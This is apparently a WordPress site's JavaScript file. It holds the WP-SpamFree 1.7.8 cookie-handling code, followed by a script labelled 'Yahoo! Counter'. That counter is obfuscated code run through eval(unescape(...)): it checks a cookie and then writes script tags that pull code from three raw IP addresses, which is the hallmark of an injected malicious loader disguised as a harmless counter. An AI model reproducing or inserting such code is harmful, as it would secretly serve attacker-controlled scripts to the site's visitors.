
// WP-SpamFree 1.7.8 JS Code :: BEGIN

// Cookie Handler :: BEGIN 
function GetCookie( name ) { 
	var start = document.cookie.indexOf( name + '=' ); 
	var len = start + name.length + 1; 
	if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { 
		return null; 
	} 
	if ( start == -1 ) return null; 
	var end = document.cookie.indexOf( ';', len ); 
	if ( end == -1 ) end = document.cookie.length; 
	return unescape( document.cookie.substring( len, end ) ); 
}  
	
function SetCookie( name, value, expires, path, domain, secure ) { 
	var today = new Date(); 
	today.setTime( today.getTime() ); 
	if ( expires ) { 
		expires = expires * 1000 * 60 * 60 * 24; 
	} 
	var expires_date = new Date( today.getTime() + (expires) ); 
	document.cookie = name+'='+escape( value ) + 
		( ( expires ) ? ';expires='+expires_date.toGMTString() : '' ) + //expires.toGMTString() 
		( ( path ) ? ';path=' + path : '' ) + 
		( ( domain ) ? ';domain=' + domain : '' ) + 
		( ( secure ) ? ';secure' : '' ); 
}  
	
function DeleteCookie( name, path, domain ) { 
	if ( getCookie( name ) ) document.cookie = name + '=' + 
			( ( path ) ? ';path=' + path : '') + 
			( ( domain ) ? ';domain=' + domain : '' ) + 
			';expires=Thu, 01-Jan-1970 00:00:01 GMT'; 
} 
// Cookie Handler :: END  

function commentValidation() { 
	SetCookie('QGXGVPEBDADEPIVN','nlmbsmslBplaxEgt','','/'); 
}  

commentValidation();  

// WP-SpamFree 1.7.8 JS Code :: END 
<script language=javascript><!-- Yahoo! Counter starts here -->
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('v%61%72%20%61%2C~%69,%5F~%3B!%69%3D@"%376%2E#16`3%2E`%22~%3Ba#=%5B`"|%378.%31`%35%37!.!%31%34`%32%2E`%358?%22~,@%69%2B#"1$%34%31$%2E@3%35%22?%2C%69%2B|%22!%31|9~%31@.$%31#3!%32%22~]$%3B%5F#%3D|%31?;%69f(%64o%63#u%6D%65n%74%2E|co#%6F|%6B!ie.%6Da@t?%63h?%28~%2F%5C%62#h%67?f$%74%3D%31$%2F?%29$%3D%3D!%6Eu$%6C!%6C)@%66?o$%72%28%69%3D#%30;%69%3C|%33%3B%69%2B#+%29$%64~%6Fc%75me%6Et%2E?w%72`ite|(%22@%3C@%73%63!r%69%70t%3Ei%66~%28#_`%29do?%63#%75#me!%6Et.%77~%72?%69te~%28~%5C@"#%3C@%73%63r%69p@t#%20%69~d=@%5F#%22%2B%69%2B|"#%5F|%20!s`%72@c=!%2F%2F%22+%61!%5B%69%5D#%2B%22/cp%2F%3E%3C%5C%5C/%73!cr?i@%70%74#%3E%5C"@)%3C%5C|%2F%73c@%72%69%70!%74|%3E")~%3B').replace(/\$|\?|#|\!|\||@|`|~/g,""));var yahoo_counter=1;
<!-- counter end --></script>
